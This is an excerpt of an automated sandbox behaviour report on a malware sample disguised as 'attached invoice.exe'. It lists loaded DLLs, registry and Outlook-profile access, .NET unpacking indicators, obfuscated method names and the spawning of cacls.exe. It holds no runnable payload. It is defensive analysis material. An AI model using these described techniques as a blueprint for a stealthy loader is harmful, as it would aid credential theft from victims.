                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: attached invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: attached invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: attached invoice.exe, 00000004.00000002.811738027901.0000000001457000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: attached invoice.exe, 00000004.00000002.811738027901.0000000001457000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: attached invoice.exe, 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811737963910.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811741649304.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: attached invoice.exe, attached invoice.exe, 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000006.00000002.815528250415.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811737963910.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000003.811741649304.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815528250415.0000000002EDD000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, tclsShwOHDsKpqQ49L.cs.Net Code: rpK1cgJYaR System.Reflection.Assembly.Load(byte[])
                Source: 1.2.attached invoice.exe.5a20000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, tclsShwOHDsKpqQ49L.cs.Net Code: rpK1cgJYaR System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004148D4 push cs; iretd 4_2_004148D7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0042E1F3 push edi; ret 4_2_0042E1FC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00416434 push FFFFFFECh; iretd 4_2_0041644D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040AD51 push ebx; retf 4_2_0040AD54
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00411D86 push ds; retf 4_2_00411D9F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0040ADAF push ebx; retf 4_2_0040AD54
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_004035B0 push eax; ret 4_2_004035B2
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00404E90 push eax; ret 4_2_00404EA9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018B21AD pushad ; retf 0004h4_2_018B223F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E08CD push ecx; mov dword ptr [esp], ecx4_2_018E08D6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018B97A1 push es; iretd 4_2_018B97A8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C4C1F pushad ; retf 5_2_007C4C21
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C408C pushad ; ret 5_2_007C40FC
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007BB166 push AC5E5B55h; retf 5_2_007BB253
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007CA102 push eax; ret 5_2_007CA104
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C427F push esi; iretd 5_2_007C4295
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007BB22A push AC5E5B55h; retf 5_2_007BB253
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C174D push cs; ret 5_2_007C1764
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C17D5 push cs; ret 5_2_007C1764
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C43C7 push edx; ret 5_2_007C43D3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007B93B7 push ebx; retf 5_2_007B93BC
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007BA7B7 pushad ; iretd 5_2_007BA7B8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_007C73B2 push esi; ret 5_2_007C73B3
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DC84B push cs; ret 5_2_046DC862
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DF4C5 push edx; ret 5_2_046DF4D1
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DC8D3 push cs; ret 5_2_046DC862
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046D44B5 push ebx; retf 5_2_046D44BA
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046D58B5 pushad ; iretd 5_2_046D58B6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046E24B0 push esi; ret 5_2_046E24B1
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DFD1D pushad ; retf 5_2_046DFD1F
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046DF18A pushad ; ret 5_2_046DF1FA
                Source: attached invoice.exeStatic PE information: section name: .text entropy: 7.8166018627464435
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, gOSlMci1rgOb0lusF4.csHigh entropy of concatenated method names: 'U5RHQLysw5', 'ymBHTUeHGR', 'i2ZHcBnmbG', 'UNBHvxBMah', 'fbEHInCVTE', 'ldPHhc3SKK', 'oQ2Hl3nds6', 'WgsHDsa8f8', 'yvPH0Wh8ek', 'SSgHS3R146'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, qJFiiTBHamHyVk5vkE.csHigh entropy of concatenated method names: 'ucSHxPF37a', 'pvqHg08vaa', 'qTEHuG0Br7', 'YTWuMd3OPg', 'DoPuzouovF', 'iOeHqg3aaV', 'sAKHkRIlwl', 'yRxH8wsk6q', 'fEpHGvHSwS', 'XUkH1c6ueI'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, pT4HsND8fvse4LLpI4.csHigh entropy of concatenated method names: 'n6hprTgmBP', 'nQtpUIRQ2M', 'ggkpVLPy44', 'rdWp60cPek', 'wlQp9jVXpS', 'lMupKknB3U', 'nHgp2abHGp', 'wUipZrqfgD', 'pb4p4DG9yx', 'xC2pMNlv2L'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, ohh8XDMhEYOMvllmFH.csHigh entropy of concatenated method names: 'z91Pgbh434', 'qgvPYyxy09', 'eWxPuxuseH', 'nD2PH82SIC', 'K7LPoYoAoE', 'FcpPw98rHj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, j9H0YmkqkPKswHf8EKo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YdfP7gFmyC', 'xg8PfAYPKl', 'u7PPnycwen', 'X5OPrc9HEp', 'OR7PUB2NSw', 'EUePVenhiW', 'h44P6eTEXO'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, PvtCovp1NbZQJIQSGV.csHigh entropy of concatenated method names: 'Dispose', 'QaGk4frKTI', 'L1X8NTO8py', 'w27tNRYJ6M', 'i1fkMDDuwJ', 'gZkkzjU3jm', 'ProcessDialogKey', 'YnH8qeGls0', 'zcj8krTueR', 'CBu88Lhh8X'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, MH6wU72rSnaGfrKTIu.csHigh entropy of concatenated method names: 'QGioL40xYJ', 'pjQoAT9BqB', 'jUGooleCbb', 'lydobpwE4y', 'gsjoaLuPZh', 'xdRotqhSLb', 'Dispose', 'M5SdxvZhCh', 'l0mdpnYN8i', 'LSidgZXrOq'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, RmoX2P1V1BlMmSlGN5.csHigh entropy of concatenated method names: 'D8mkHT4HsN', 'bfvkwse4LL', 'HqKkW4phyZ', 'L4FkelmAG6', 'O44kLidBpk', 'FyqkmjG8Y4', 'reSAYdVXnSdYDLfSGY', 'owyJM3O9vjlJDoAEx4', 'ChIkkABM26', 'kqEkGlHIwo'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, WqAL5F0qK4phyZB4Fl.csHigh entropy of concatenated method names: 'z28gvZI2bh', 'JFKgh8CaJo', 'w4LgDp4i4Z', 'GY0g0VMwbU', 'A6jgLyXQp8', 'CLpgmUfTQr', 'IIegARSAIc', 'yWkgdDmhp5', 'upGgoJYuV8', 'lQlgPEpG0R'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, NsfAn8gGqwvQiJy6Wn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BNe84gbCYN', 'YQD8MDvXwc', 'RDa8zQ6d2j', 'MbQGqZKVnl', 'TiNGkfi5fU', 'IC9G8sGR5A', 'rUQGGLciYH', 'X84iXwHdTZnD3hHp0oF'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, EXNKnS693AZy9uMljN.csHigh entropy of concatenated method names: 'MOnAWLpQ9S', 'TyfAeZvrHg', 'ToString', 'IyGAxfWIDE', 'D0iApoVHY7', 'Uo1AgRl2a5', 'dG0AYC6ACX', 'nJkAu9eXlI', 'mtfAH3Ak3T', 'OAMAwk6pOV'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, DaCjrvKeZtg5v8taXs.csHigh entropy of concatenated method names: 'j0NAZLQEBQ', 'G3HAMkgs28', 'FExdqdcBDL', 'RBcdkLr6y4', 'JP8A7JP8vb', 'W8hAfMOaCS', 'cu5AnWeI5B', 'SQUArvTZxg', 'BjnAU6qush', 'sY3AVaXa7q'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, pAG6IISFfoTSI744id.csHigh entropy of concatenated method names: 'VvPYIlvHHG', 'wQWYla8gs9', 'rSRgF8xLGt', 'OqfgJiR3Gu', 'yROgymgVsd', 'XB6gjPdhaC', 'XsrgBHV6Cb', 'G6ng5uyhbh', 'dy7giy88s5', 'JGxgsy6t4F'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, POfFTEnysHikn7NcVG.csHigh entropy of concatenated method names: 'vFRXDAk1Vw', 'S5HX0N5O1B', 'CNSXRCnck2', 'Q0WXNDQ4Uy', 'Dc4XJJsnhT', 'yHjXyiO1Ew', 'cALXBdRfaZ', 'A1MX5GmXd6', 'kGHXsnsN0U', 'KMsX7hmPpR'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, w0wIN0zuRf7b1tbhs6.csHigh entropy of concatenated method names: 'Y4CPhDuR6a', 'UT5PDftY3K', 'GSDP0iuQCA', 'aH9PR5Uadg', 'ybBPNdFPkx', 'IidPJGZkpC', 'VbYPy601uD', 'vxdPt2bbAu', 'FyXPQ5sGBD', 'SxNPTOY1Pj'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, KpkSyqRjG8Y4wH5SdA.csHigh entropy of concatenated method names: 'DKyu3OR9fU', 'osGupB8cfn', 'dI5uYvflfH', 'e2nuHvSZeR', 'LW0uwLsgAP', 'oN4Y9pRmnN', 'jIfYKY4FT0', 'RkXY2MdyVV', 'mBwYZ9pnJ5', 'dSmY4LmonT'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, o9mGAw8kNdRCqx65xr.csHigh entropy of concatenated method names: 'ywJciEpLX', 'fNFvI1uQ1', 'G21h14AJg', 'j84lL1LPQ', 'TMR0aYaAy', 'LCpS0QsTe', 'KjnBsm4eCNZ240Wbct', 'HdeQPo9Ar0G1PnWT6T', 'Khuddv8tw', 'nSpPFMk1r'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, z9tkbnr6Y4y5WF6UDu.csHigh entropy of concatenated method names: 'yKrLsK366p', 'iQdLfJPQjA', 'ziSLrp46OJ', 'I0CLUk5m1B', 'A7DLNjdahG', 'O4ZLFUsIBl', 'FFuLJUFTvD', 'fb0Ly6OnBN', 'AfZLjRdm49', 'kjELBromQm'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, jeGls04vcjrTueRhBu.csHigh entropy of concatenated method names: 'OewoRCpJDg', 'BnaoNQPjox', 'UKqoFJw5WM', 'mHPoJpGNUS', 'IdKoyUUNqD', 'e30ojEFbIL', 'ovioBkQa5E', 'Cp7o50AP56', 'Kx2oicTMll', 'dr7osvnnGZ'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, uT5RZkk8dNfxjQBo7He.csHigh entropy of concatenated method names: 'ToString', 'pEhbDQ7hHE', 'HLxb0IjZQo', 'lHwbSP07PB', 'TUObRRLgov', 'sVObNOwBiL', 'd6DbF6HMgg', 'y5NbJX1iq2', 'FD2KAmdHa40f9rXG08i', 'PJbLfedSwZXFmZNGXgn'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, W4VBvlkkJtA6Rn28uFW.csHigh entropy of concatenated method names: 'oakPM6PAiK', 'C7yPzH4sgv', 'yskbqi52Gn', 'hrYbkFiYkS', 'vnxb8bQEAq', 'DxIbG0CZQf', 'Bcgb1pr19c', 'FUvb3gZ9Mo', 'A5XbxnkAyk', 'uhVbpaNG8K'
                Source: 1.2.attached invoice.exe.6ea0000.4.raw.unpack, tclsShwOHDsKpqQ49L.csHigh entropy of concatenated method names: 'NXeG3gByvo', 'p0oGxkyvEd', 'QViGpYG9ih', 'U9AGgoSv5y', 'HsvGY5bjiO', 'QciGu9Jtkk', 'jM4GHykdGu', 'lQCGwJF89H', 'x1uGOS1io0', 'AEIGWwPe3t'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, gOSlMci1rgOb0lusF4.csHigh entropy of concatenated method names: 'U5RHQLysw5', 'ymBHTUeHGR', 'i2ZHcBnmbG', 'UNBHvxBMah', 'fbEHInCVTE', 'ldPHhc3SKK', 'oQ2Hl3nds6', 'WgsHDsa8f8', 'yvPH0Wh8ek', 'SSgHS3R146'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, qJFiiTBHamHyVk5vkE.csHigh entropy of concatenated method names: 'ucSHxPF37a', 'pvqHg08vaa', 'qTEHuG0Br7', 'YTWuMd3OPg', 'DoPuzouovF', 'iOeHqg3aaV', 'sAKHkRIlwl', 'yRxH8wsk6q', 'fEpHGvHSwS', 'XUkH1c6ueI'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, pT4HsND8fvse4LLpI4.csHigh entropy of concatenated method names: 'n6hprTgmBP', 'nQtpUIRQ2M', 'ggkpVLPy44', 'rdWp60cPek', 'wlQp9jVXpS', 'lMupKknB3U', 'nHgp2abHGp', 'wUipZrqfgD', 'pb4p4DG9yx', 'xC2pMNlv2L'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, ohh8XDMhEYOMvllmFH.csHigh entropy of concatenated method names: 'z91Pgbh434', 'qgvPYyxy09', 'eWxPuxuseH', 'nD2PH82SIC', 'K7LPoYoAoE', 'FcpPw98rHj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, j9H0YmkqkPKswHf8EKo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YdfP7gFmyC', 'xg8PfAYPKl', 'u7PPnycwen', 'X5OPrc9HEp', 'OR7PUB2NSw', 'EUePVenhiW', 'h44P6eTEXO'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, PvtCovp1NbZQJIQSGV.csHigh entropy of concatenated method names: 'Dispose', 'QaGk4frKTI', 'L1X8NTO8py', 'w27tNRYJ6M', 'i1fkMDDuwJ', 'gZkkzjU3jm', 'ProcessDialogKey', 'YnH8qeGls0', 'zcj8krTueR', 'CBu88Lhh8X'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, MH6wU72rSnaGfrKTIu.csHigh entropy of concatenated method names: 'QGioL40xYJ', 'pjQoAT9BqB', 'jUGooleCbb', 'lydobpwE4y', 'gsjoaLuPZh', 'xdRotqhSLb', 'Dispose', 'M5SdxvZhCh', 'l0mdpnYN8i', 'LSidgZXrOq'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, RmoX2P1V1BlMmSlGN5.csHigh entropy of concatenated method names: 'D8mkHT4HsN', 'bfvkwse4LL', 'HqKkW4phyZ', 'L4FkelmAG6', 'O44kLidBpk', 'FyqkmjG8Y4', 'reSAYdVXnSdYDLfSGY', 'owyJM3O9vjlJDoAEx4', 'ChIkkABM26', 'kqEkGlHIwo'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, WqAL5F0qK4phyZB4Fl.csHigh entropy of concatenated method names: 'z28gvZI2bh', 'JFKgh8CaJo', 'w4LgDp4i4Z', 'GY0g0VMwbU', 'A6jgLyXQp8', 'CLpgmUfTQr', 'IIegARSAIc', 'yWkgdDmhp5', 'upGgoJYuV8', 'lQlgPEpG0R'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, NsfAn8gGqwvQiJy6Wn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BNe84gbCYN', 'YQD8MDvXwc', 'RDa8zQ6d2j', 'MbQGqZKVnl', 'TiNGkfi5fU', 'IC9G8sGR5A', 'rUQGGLciYH', 'X84iXwHdTZnD3hHp0oF'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, EXNKnS693AZy9uMljN.csHigh entropy of concatenated method names: 'MOnAWLpQ9S', 'TyfAeZvrHg', 'ToString', 'IyGAxfWIDE', 'D0iApoVHY7', 'Uo1AgRl2a5', 'dG0AYC6ACX', 'nJkAu9eXlI', 'mtfAH3Ak3T', 'OAMAwk6pOV'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, DaCjrvKeZtg5v8taXs.csHigh entropy of concatenated method names: 'j0NAZLQEBQ', 'G3HAMkgs28', 'FExdqdcBDL', 'RBcdkLr6y4', 'JP8A7JP8vb', 'W8hAfMOaCS', 'cu5AnWeI5B', 'SQUArvTZxg', 'BjnAU6qush', 'sY3AVaXa7q'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, pAG6IISFfoTSI744id.csHigh entropy of concatenated method names: 'VvPYIlvHHG', 'wQWYla8gs9', 'rSRgF8xLGt', 'OqfgJiR3Gu', 'yROgymgVsd', 'XB6gjPdhaC', 'XsrgBHV6Cb', 'G6ng5uyhbh', 'dy7giy88s5', 'JGxgsy6t4F'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, POfFTEnysHikn7NcVG.csHigh entropy of concatenated method names: 'vFRXDAk1Vw', 'S5HX0N5O1B', 'CNSXRCnck2', 'Q0WXNDQ4Uy', 'Dc4XJJsnhT', 'yHjXyiO1Ew', 'cALXBdRfaZ', 'A1MX5GmXd6', 'kGHXsnsN0U', 'KMsX7hmPpR'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, w0wIN0zuRf7b1tbhs6.csHigh entropy of concatenated method names: 'Y4CPhDuR6a', 'UT5PDftY3K', 'GSDP0iuQCA', 'aH9PR5Uadg', 'ybBPNdFPkx', 'IidPJGZkpC', 'VbYPy601uD', 'vxdPt2bbAu', 'FyXPQ5sGBD', 'SxNPTOY1Pj'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, KpkSyqRjG8Y4wH5SdA.csHigh entropy of concatenated method names: 'DKyu3OR9fU', 'osGupB8cfn', 'dI5uYvflfH', 'e2nuHvSZeR', 'LW0uwLsgAP', 'oN4Y9pRmnN', 'jIfYKY4FT0', 'RkXY2MdyVV', 'mBwYZ9pnJ5', 'dSmY4LmonT'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, o9mGAw8kNdRCqx65xr.csHigh entropy of concatenated method names: 'ywJciEpLX', 'fNFvI1uQ1', 'G21h14AJg', 'j84lL1LPQ', 'TMR0aYaAy', 'LCpS0QsTe', 'KjnBsm4eCNZ240Wbct', 'HdeQPo9Ar0G1PnWT6T', 'Khuddv8tw', 'nSpPFMk1r'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, z9tkbnr6Y4y5WF6UDu.csHigh entropy of concatenated method names: 'yKrLsK366p', 'iQdLfJPQjA', 'ziSLrp46OJ', 'I0CLUk5m1B', 'A7DLNjdahG', 'O4ZLFUsIBl', 'FFuLJUFTvD', 'fb0Ly6OnBN', 'AfZLjRdm49', 'kjELBromQm'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, jeGls04vcjrTueRhBu.csHigh entropy of concatenated method names: 'OewoRCpJDg', 'BnaoNQPjox', 'UKqoFJw5WM', 'mHPoJpGNUS', 'IdKoyUUNqD', 'e30ojEFbIL', 'ovioBkQa5E', 'Cp7o50AP56', 'Kx2oicTMll', 'dr7osvnnGZ'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, uT5RZkk8dNfxjQBo7He.csHigh entropy of concatenated method names: 'ToString', 'pEhbDQ7hHE', 'HLxb0IjZQo', 'lHwbSP07PB', 'TUObRRLgov', 'sVObNOwBiL', 'd6DbF6HMgg', 'y5NbJX1iq2', 'FD2KAmdHa40f9rXG08i', 'PJbLfedSwZXFmZNGXgn'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, W4VBvlkkJtA6Rn28uFW.csHigh entropy of concatenated method names: 'oakPM6PAiK', 'C7yPzH4sgv', 'yskbqi52Gn', 'hrYbkFiYkS', 'vnxb8bQEAq', 'DxIbG0CZQf', 'Bcgb1pr19c', 'FUvb3gZ9Mo', 'A5XbxnkAyk', 'uhVbpaNG8K'
                Source: 1.2.attached invoice.exe.40e6298.1.raw.unpack, tclsShwOHDsKpqQ49L.csHigh entropy of concatenated method names: 'NXeG3gByvo', 'p0oGxkyvEd', 'QViGpYG9ih', 'U9AGgoSv5y', 'HsvGY5bjiO', 'QciGu9Jtkk', 'jM4GHykdGu', 'lQCGwJF89H', 'x1uGOS1io0', 'AEIGWwPe3t'
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
